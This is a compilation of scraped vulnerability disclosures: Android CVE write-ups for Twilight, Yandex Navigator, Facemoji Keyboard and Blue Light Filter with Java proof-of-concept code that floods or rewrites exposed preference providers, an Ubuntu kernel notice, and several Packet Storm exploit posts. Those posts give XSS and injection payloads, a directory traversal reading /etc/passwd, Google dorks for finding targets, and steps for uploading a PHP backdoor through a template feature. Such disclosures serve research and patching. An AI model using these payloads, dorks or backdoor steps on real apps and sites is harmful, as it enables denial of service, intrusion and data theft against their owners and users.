An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Twilight（CVE-2023-29756）**

Vendor: Twilight(http://twilight.urbandroid.org/)

Affected product: Twilight(com.urbandroid.lux)

Version: 13.3

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.lux

Description of the vulnerability for use in the CVE：An issue found in Twilight v.13.3 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Twilight application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

ContentResolver contentResolver = getApplicationContext().getContentResolver();
Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
while(true){
    ContentValues contentValues = new ContentValues();
    String string = getRandomString(10000);
    contentValues.put(string,string);
    contentResolver.insert(parse,contentValues);
}

CVE-2023-29756: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Yandex Navigator（CVE-2023-29749）**

Vendor: Yandex (https://yandex.com/)

Affected product: Yandex Navigator(ru.yandex.yandexnavi)

Version: 6.60

Download link：https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1

Description of the vulnerability for use in the CVE：An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference file, which is loaded into memory for use at application startup, thus affecting the implementation of certain features of the application. For example, an attacker can modify the "notification-enabled" value in the ru.yandex.yandexnavi.preferences.xml file through the interface provided in the exposed components of the Yandex Navigator application. This can turn off the search box in the notification bar of the application, affecting the normal functionality of the application and causing an escalation of privilege attack. In fact, attacker can insert data into any SharedPreferences file whose name start with 'ru.yandex.yandexnavi.', like 'ru.yandex.yandexnavi.ui.PermissionDelegateImpl.PREFERENCES' . In fact, I found that there are many SharedPreferences files like this and they store a lot of important data.

poc：

public void attack\_ru() {
        ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", "ru.yandex.common.clid.ClidService");
        Intent intent = new Intent();
        intent.setComponent(componentName);
        intent.putExtra("service\_version", 0);
        intent.setAction("ru.yandex.common.clid.update\_preferences");
        intent.putExtra("preferences", "ui.PermissionDelegateImpl.PREFERENCES");
        intent.putExtra("application", "ru.yandex.yandexnavi");
        Bundle bundle = new Bundle();
        Bundle bundle2 = new Bundle();
        Bundle bundle3 = new Bundle();
        bundle2.putBoolean("MICROPHONE", false);
        long time = 1657202353619L;
        bundle3.putLong("MICROPHONE", time);
        bundle.putBundle("bundle-values", bundle2);
        bundle.putBundle("bundle-time", bundle3);
        intent.putExtra("bundle", bundle);
        ServiceConnection connection = new ServiceConnection() {
            @Override
            public void onServiceConnected(ComponentName name, IBinder service) {
            }
            @Override
            public void onServiceDisconnected(ComponentName name) {
            }
        };
        bindService(intent, connection, BIND\_AUTO\_CREATE);
    }

CVE-2023-29749: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.

**Escalation of Privileges exists in Facemoji Emoji Keyboard（CVE-2023-29752）**

Vendor: EKATOX APPS(https://www.facemojikeyboard.com/)

Affected product: Facemoji Emoji Keyboard(com.simejikeyboard)

Version: 2.9.1.2

Download link：https://play.google.com/store/apps/details?id=com.simejikeyboard

Description of the vulnerability for use in the CVE：An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.

Additional information: The Facemoji Emoji Keyboard application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application launch and affects critical application functionality. Specifically, an attacker is able to modify the data in the profile\_enable\_subtype.xml file by constructing an intent carrying malicious data. When the key\_enable\_subtype field is modified to an arbitrary string, the virtual keyboard that comes with this application will not be able to output any characters. More seriously, when the key\_enable\_subtype and key\_subtype\_enable\_layout fields are modified to any string at the same time, the virtual keyboard will not pop up when any input box is clicked, and the application will keep reporting errors, leading to escalation of privilege attacks.

poc:

  public void attack\_keybord(){
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.simejikeyboard.dprefrenceprovider/string/profile\_enable\_subtype/xxx");
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(10240);
            contentValues.put("key","key\_enable\_subtype");
            contentValues.put("value",randomString);
            contentResolver.insert(uri,contentValues);
    }

CVE-2023-29752: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Blue Light Filter（CVE-2023-29757）**

Vendor: Leap Fitness Group(https://leap.app/)

Affected product: Blue Light Filter(com.eyefilter.nightmode.bluelightfilter)

Version: 1.5.5

Download link： https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter

Description of the vulnerability for use in the CVE：An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Blue Light Filter application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change the application's color temperature by modifying the current\_ct field in the SharedPreference file, causing the phone to display abnormally and resulting in an elevation of privilege attack.

poc:

 public void attack\_eye() {
        ContentResolver contentResolver = getContentResolver();
        ContentValues contentValues = new ContentValues();
        Uri uri = Uri.parse("content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE\_AUTHORITY/a/a");
        contentValues.put("dim", 50);
        contentValues.put("filter\_capacity", 100000);
        contentValues.put("language\_index", -1);//设置语言
        contentValues.put("current\_ct", 600);//设置当前色温
        contentResolver.insert(uri, contentValues);
    }

CVE-2023-29757: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Blue Light Filter（CVE-2023-29758）**

Vendor: Leap Fitness Group(https://leap.app/)

Affected product: Blue Light Filter(com.eyefilter.nightmode.bluelightfilter)

Version: 1.5.5

Download link： https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter

Description of the vulnerability for use in the CVE：An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Blue Light Filter application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

 public void attack\_eye() {
        while(true) {
            ContentResolver contentResolver = getContentResolver();
            ContentValues contentValues = new ContentValues();
            Uri uri = Uri.parse("content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE\_AUTHORITY/a/a");
            String randomString = getRandomString(1000);
            contentValues.put(randomString,randomString);
            contentResolver.insert(uri, contentValues);
        }
    }

CVE-2023-29758: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

Ubuntu Security Notice 6152-1 - It was discovered that NFS client's access cache implementation in the Linux kernel caused a severe NFS performance degradation in certain conditions. This updated makes the NFS file-access stale cache behavior to be optional.

==========================================================================  
Ubuntu Security Notice USN-6152-1  
June 08, 2023

linux-gke regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

The system could suffer with performance degradation in certain conditions.

Software Description:  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that NFS client's access cache implementation in the  
Linux kernel caused a severe NFS performance degradation in certain  
conditions. This updated makes the NFS file-access stale cache behavior  
to be optional.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1035-gke     5.15.0-1035.40  
   linux-image-gke                 5.15.0.1035.34  
   linux-image-gke-5.15            5.15.0.1035.34

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1101-gke      5.4.0-1101.108  
   linux-image-gke                 5.4.0.1101.106  
   linux-image-gke-5.4             5.4.0.1101.106

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6152-1  
   https://launchpad.net/bugs/2022098

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1035.40  
   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1101.108

Ubuntu Security Notice USN-6152-1

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

**P2S CMS 0.1 Cross Site Scripting**

Posted Jun 9, 2023

Authored by indoushka

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7bb6a5d8c0fb7077e0992b71833738c252f38ebb48abe398cde8f60022fba24c

Download | Favorite | View

**P2S CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : P2s-cms v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://www.primestart.net/                                                                                        || # Dork      : index.php?page=busca&palavra=                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/avamcombr/index.php?page=busca&palavra=%3Cscript%3Ealert(/indoushka/);%3C/script%3E        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,354)
*   Arbitrary (16,067)
*   BBS (2,859)
*   Bypass (1,694)
*   CGI (1,024)
*   Code Execution (7,157)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,317)
*   DoS (23,189)
*   Encryption (2,363)
*   Exploit (51,175)
*   File Inclusion (4,195)
*   File Upload (955)
*   Firewall (821)
*   Info Disclosure (2,720)
*   Intrusion Detection (884)
*   Java (3,002)
*   JavaScript (841)
*   Kernel (6,577)
*   Local (14,393)
*   Magazine (586)
*   Overflow (12,614)
*   Perl (1,423)
*   PHP (5,124)
*   Proof of Concept (2,302)
*   Protocol (3,567)
*   Python (1,509)
*   Remote (30,515)
*   Root (3,556)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,854)
*   Shell (3,163)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,234)
*   TCP (2,394)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,597)
*   Web (9,571)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,693)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,979)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,758)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (344)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,866)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,370)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,652)
*   UNIX (9,246)
*   UnixWare (186)
*   Windows (6,557)
*   Other

P2S CMS 0.1 Cross Site Scripting

MVC Shop version 0.5 suffers from a directory traversal vulnerability.

====================================================================================================================================| # Title     : mvc-shop v0.5 Directory Traversal Vulnerability Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5                                                        || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  infested file : index.php & admin.php<?phpsession_start();require_once('lib/model.php');require_once('lib/functions.php');require_once('content/models/cart.php');require "lib/statistics.php";require "lib/counter.php";// $count_file = 'logs/counter.txt';// $ip_file = 'logs/ip.txt';// function counting_ip()// {//     $ip = $_SERVER['REMOTE_ADDR'];//     global $count_file, $ip_file;//     if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {//         $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;//         file_put_contents($ip_file, $ip . "\n", FILE_APPEND);//         file_put_contents($count_file, ++$current_val);//     }// }// counting_ip();if (isset($_GET['controller'])) $controller = $_GET['controller'];else $controller = 'home';if (isset($_GET['action'])) $action = $_GET['action'];else $action = 'index';$file = 'content/controllers/' . $controller . '/' . $action . '.php';if (file_exists($file)) {    require($file);} else {    show_404();}[+]  use payload : ../../../../../../../../../etc/passwd[+]  https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd[+]  https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd== Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

MVC Shop 0.5 Directory Traversal

PHP Live version 3.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : PHP Live 3.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://www.phplivesupport.com                                                                                     |  | # Dork      : "powered by PHP Live! "                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /message_box.php?action=submit&deptid=1 AND 3*2*1%3d6 AND 556%3d556&email=sample%40email.tst&l=e-assis&message=20&name=xtmxbmyr&requestid=&send=Enviar Email&subject=1&x=1[+] Test : http://127.0.0.1/cestaseflorescriscombr/chat/message_box.php?action=submit&deptid=1%20AND%203*2*1%3d6%20AND%20556%3d556&email=sample%40email.tst&l=e-assis&message=20&name=xtmxbmyr&requestid=&send=Enviar%20Email&subject=1&x=1 .Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

PHP Live 3.1 Cross Site Scripting

Acelle Email Marketing version 4.0.25 suffers from an arbitrary file upload vulnerability.

====================================================================================================================================  
| # Title     : Acelle Email Marketing 4.0.25 LTS unrestricted file uploads Vulnerability                                          |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                            |  
| # Vendor    : https://acellemail.com/                                                                                            |    
| # Dork      : "Acelle Email Marketing Application by acellemail.com"                                                            |  
====================================================================================================================================

poc :

[+]  Unrestricted file uploads You can upload malicious files in compressed format

[+]  Dorking İn Google Or Other Search Enggine .

[+]  go to templates : https://127.0.0.1/demoacellemailcom/admin/templates or https://127.0.0.1/demoacellemailcom/templates

[+]  Zip your backdoor And upload it.

[+]  chose web site and singup .

[+]  The method is easy and simple : You can use the HTML file to find out the upload path .

[+]  attach the file to be used with the first file and compress the two files with the ZIP extension .

[+]  So that in the HTML file we write the following code :

<!doctype html>  
<html lang="zxx">

<head>  
    
  <meta charset="utf-8">  
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">  
  <title>indoushka : PacketStorm Security</title>  
    
  <link rel="stylesheet" href="backdoor.php">

  </body>

</html>

[+] <link rel="stylesheet" href="backdoor.php"> <========| Here we write the name of the second attached file .

[+] When we upload the file and review it, we open the source code for viewing, and through the source code we know the path to upload the files and we open them

        Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |  
=======================================================================================================================================

Tag

#google